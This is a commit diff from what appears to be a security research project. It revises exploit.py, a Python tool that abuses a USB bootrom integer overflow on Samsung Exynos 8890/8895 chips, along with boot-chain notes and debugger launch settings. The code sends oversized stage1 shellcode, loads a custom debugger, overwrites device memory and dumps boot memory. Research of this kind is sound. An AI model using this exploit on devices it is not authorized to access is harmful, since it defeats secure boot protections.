altered-script-flow #1
@ -10,14 +10,20 @@ Current boot chain:
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Boot chain
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As done by Frederic, the bootrom can be dumped using his provided scripts, and can the be split into different boots:
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.. code-block:: bash
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./exynos-usbdl e payloads/Exynos8890_dump_bootrom.bin dumped_sboot.bin
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scripts/split-sboot-8890.sh dumped_sboot.bin
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debugger
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========
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Some other information about the debugger and it's current state.
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bl1
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===
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Loads at address ``0x02024000`` and contains some form of header.
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Loads at address ``0x02024000`` and contains some form of header (ramdump).
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There seems to be a samsung header format, where the first 4 bytes define the entry point of the binary.
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In this case this entry is ``+0x10`` so we jump to ``0x02024010``.
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23
source/exploit/.vscode/launch.json
vendored
23
source/exploit/.vscode/launch.json
vendored
@ -5,21 +5,38 @@
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"version": "0.2.0",
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"configurations": [
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{
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"name": "Debug exploit",
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"name": "Debug usb stack",
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"type": "debugpy",
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"request": "launch",
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"program": "exploit.py",
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"console": "integratedTerminal",
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"args": ["--debug"]
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"args": ["--usb-debug"]
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},
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{
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"name": "Run chain",
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"name": "Run boot chain",
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"type": "debugpy",
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"request": "launch",
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"program": "exploit.py",
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"console": "integratedTerminal",
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"justMyCode": false,
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"args": ["--run-boot-chain"]
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},
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{
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"name": "Debug on device",
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"type": "debugpy",
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"request": "launch",
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"program": "exploit.py",
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"console": "integratedTerminal",
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"justMyCode": false,
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"args": []
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},
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{
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"name": "Debug current file",
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"type": "debugpy",
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"request": "launch",
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"program": "${file}",
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"console": "integratedTerminal",
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"justMyCode": false,
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}
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]
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}
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@ -1,4 +1,3 @@
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import usb.util, usb.core
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import struct, sys, usb1, libusb1, ctypes, usb, argparse
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from keystone import *
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from capstone import *
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@ -6,6 +5,7 @@ from ghidra_assistant.utils.utils import *
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from ghidra_assistant.concrete_device import *
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from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_debugger
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from qiling.const import QL_ARCH
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import os
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def p32(x):
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return struct.pack("<I", x)
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@ -45,6 +45,9 @@ ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
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cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
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class ExynosDevice():
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"""
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Class to exploit a Exynos device (8890/8895) using the USB stack.
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"""
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def __init__(self, idVendor=0x04e8, idProduct=0x1234):
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"""Init with vendor/product IDs"""
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@ -53,9 +56,11 @@ class ExynosDevice():
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self.target = "8890" # TODO auto detect device
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self.connect_device()
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def connect_device(self):
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"""Wait for proper connection to the device"""
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"""Setup proper connection, and ensure the connection is alive"""
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self.context = usb1.USBContext()
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while True:
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self.handle = self.context.openByVendorIDAndProductID(
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vendor_id=self.idVendor,
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@ -65,7 +70,17 @@ class ExynosDevice():
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if self.handle == None:
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continue
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break
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print(f"Connected device! {self.idVendor} {self.idProduct}")
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try:
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self.handle.getDevice().getSerialNumber()
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except Exception as e:
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if e.value == usb1.libusb1.LIBUSB_ERROR_TIMEOUT or e.value == usb1.libusb1.LIBUSB_ERROR_IO:
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print("Device disconnected / not connected. Reconnect USB?")
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sys.exit(0)
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else:
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raise e
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print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
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def write(self, data):
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transferred = ctypes.c_int()
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@ -73,17 +88,16 @@ class ExynosDevice():
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assert(res == 0), "Could not perform bulk transfer"
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return res
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def send_empty_transfer(self):
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transferred = ctypes.c_int()
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
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assert(res == 0)
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return transferred.value
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def test_bug_2(self):
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'''
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Interger overflow in last packet if reamining size is 1.
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'''
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def test_bug_2(self):
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"""Interger overflow in last packet if reamining size is 1."""
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transferred = ctypes.c_int()
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bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
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bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
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@ -98,7 +112,6 @@ class ExynosDevice():
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
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while True:
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
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pass
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def test_bug(self):
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@ -116,6 +129,7 @@ class ExynosDevice():
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print('Bug probably available')
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sys.exit(0)
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def send_normal(self, payload):
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'''
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TODO not working
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@ -127,10 +141,13 @@ class ExynosDevice():
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assert res == 0, "Error sending payload"
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pass
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def exploit(self, payload: bytes):
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'''
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Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
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'''
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assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
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current_offset = TARGET_OFFSETS[self.target][0]
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xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
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transferred = ctypes.c_int()
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@ -140,6 +157,7 @@ class ExynosDevice():
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max_payload_size = 0x100000000 - size_to_overflow
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ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) #
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# Assert that payload is 502 bytes
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# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
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# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
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payload = payload + ((max_payload_size - len(payload)) * b"\x00")
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@ -209,13 +227,33 @@ class ExynosDevice():
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#Overwrite all calls to make the concrete target function properly
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concrete_device.copy_functions()
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def setup_debugger(self):
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'''
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Setup the debugger as a concrete device
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'''
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self.cd = ConcreteDevice(None, False)
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self.cd.dev = self.setup_concrete_device(self.cd)
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self.cd.test_connection()
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def usb_debug(self):
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"""
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Function to debug USB behaviour
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"""
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transferred = ctypes.c_int()
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# Send some data
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count = 0
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def _send_data():
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transferred.value = 0
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p = p32(count) + b"\xaa" * (0x200 - 4)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
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assert res == 0, f"Error sending data ({res})"
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def _recv_data():
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transferred.value = 0
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buf = ctypes.c_buffer(b"", 0x200)
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res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
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assert res == 0, f"Error receiving data ({res})"
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hexdump(buf.raw)
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# Should have received some bytes
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while True:
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_send_data()
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_recv_data()
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count += 1
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def dumb_interact(self):
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'''
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@ -225,15 +263,24 @@ class ExynosDevice():
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self.cd.arch_dbg.state.print_ctx()
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# Overwrite jump back
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self.cd.memwrite_region(0x02020108, p32(0x2069000))
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# self.cd.memwrite_region(0x020200e8, p32(0x2069000))
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# self.cd.memwrite_region(0x02020108, p32(0x2069000))
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# self.cd.memwrite_region(0x02021800, p32(0x2069000))
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self.cd.memwrite_region(0x020200e8, p32(0x02069000)) # address, data. Writes
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AUTH_BL1 = 0x00012848
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def memdump_try():
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self.cd.arch_dbg.state.LR = 0x020200e8
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self.cd.restore_stack_and_jump(0x02021810)
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stack_pointer = 0x02021810
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dumped = b""
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for block in range(0x2020000, 0x2200000, 0x200):
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stack_pointer += 0x200
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self.cd.arch_dbg.state.print_ctx()
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print(hex(block))
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dumped += self.cd.memdump_region(block, 0x200)
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if stack_pointer >= 0x02020F08:
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print(f'stack_pointer at {stack_pointer}')
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return dumped
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def auth_bl1():
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# Load the firmware
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@ -252,6 +299,8 @@ class ExynosDevice():
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# self.cd.restore_stack_and_jump(0x00012814)
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# self.cd.restore_stack_and_jump(0x000125b4)
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dumped = memdump_try()
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bl1 = open("../S7/bl1.bin", "rb").read()
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self.cd.memwrite_region(0x02024000, bl1)
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self.usb_write(b"FLSH")
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@ -265,6 +314,7 @@ class ExynosDevice():
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self.cd.arch_dbg.state.LR = 0x2069000
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self.cd.restore_stack_and_jump(0x02021810)
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bl31 = open("../S7/bl31.bin", "rb").read()
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self.cd.memwrite_region(0x02021800, bl31)
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jump_bl31()
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assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
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@ -277,13 +327,33 @@ class ExynosDevice():
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#authenticate it
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pass
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def run_boot_chain(self):
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stage1 = open("stage1/stage1.bin", "rb").read()
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self.exploit(stage1)
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def run_debugger():
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# TODO, hardcoded path
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debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
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def setup_guppy_debugger(self):
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"""
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Run the boot chain for the Exynos device.
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Load and send stage1 payload - exploit (stage1)
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"""
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def _setup_debugger():
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'''
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Setup the debugger as a concrete device
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'''
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self.cd = ConcreteDevice(None, False)
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self.cd.dev = self.setup_concrete_device(self.cd)
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self.cd.test_connection()
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def _initial_run_debugger():
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"""Write debugger to device and test basic functionality"""
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if os.getenv("USER") == "eljakim":
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debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
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else:
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try:
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debugger = open("../../dump/debugger.bin", "rb").read()
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except Exception as e:
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print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
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sys.exit(0)
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debugger += ((0x2000 - len(debugger)) * b"\x00")
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assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
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for block in range(0, len(debugger), 0x200):
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@ -296,57 +366,28 @@ class ExynosDevice():
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r = self.usb_read(0x200)
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assert r == b"PONG", f"Invalid response from device: {r}"
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run_debugger()
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self.setup_debugger()
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self.dumb_interact()
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def usb_debug():
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'''
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Function to debug USB behavior
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'''
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shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
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assert len(shellcode) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
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exynos = ExynosDevice()
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exynos.exploit(shellcode)
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transferred = ctypes.c_int()
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# Send some data
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count = 0
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def send_data():
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transferred.value = 0
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p = p32(count) + b"\xaa" * (0x200 - 4)
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res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
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assert res == 0, "Error sending data"
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def recv_data():
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transferred.value = 0
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buf = ctypes.c_buffer(b"", 0x200)
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res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
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assert res == 0, "Error receiving data"
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hexdump(buf.raw)
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pass
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# Should have received some bytes
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while True:
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send_data()
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recv_data()
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count += 1
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_initial_run_debugger()
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_setup_debugger()
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if __name__ == "__main__":
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arg = argparse.ArgumentParser("Exynos exploit")
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arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
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# Debug mode
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arg.add_argument("--usb-debug", action="store_true", help="Debug USB stack", default=False)
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arg.add_argument("--run-boot-chain", action="store_true", help="Run boot chain to boot different boot stages", default=False)
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arg.add_argument("--dumb-debug", action="store_true", help="Live debugging on device", default=True)
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args = arg.parse_args()
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if args.debug:
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usb_debug()
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sys.exit(0)
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exynos = ExynosDevice()
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exynos.run_boot_chain()
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if args.usb_debug:
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shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
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exynos.exploit(shellcode)
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exynos.usb_debug()
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elif args.run_boot_chain:
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stage1 = open("stage1/stage1.bin", "rb").read()
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exynos.exploit(stage1)
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exynos.setup_guppy_debugger()
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exynos.dumb_interact()
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sys.exit(0)
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||||
|
Loading…
Reference in New Issue
Block a user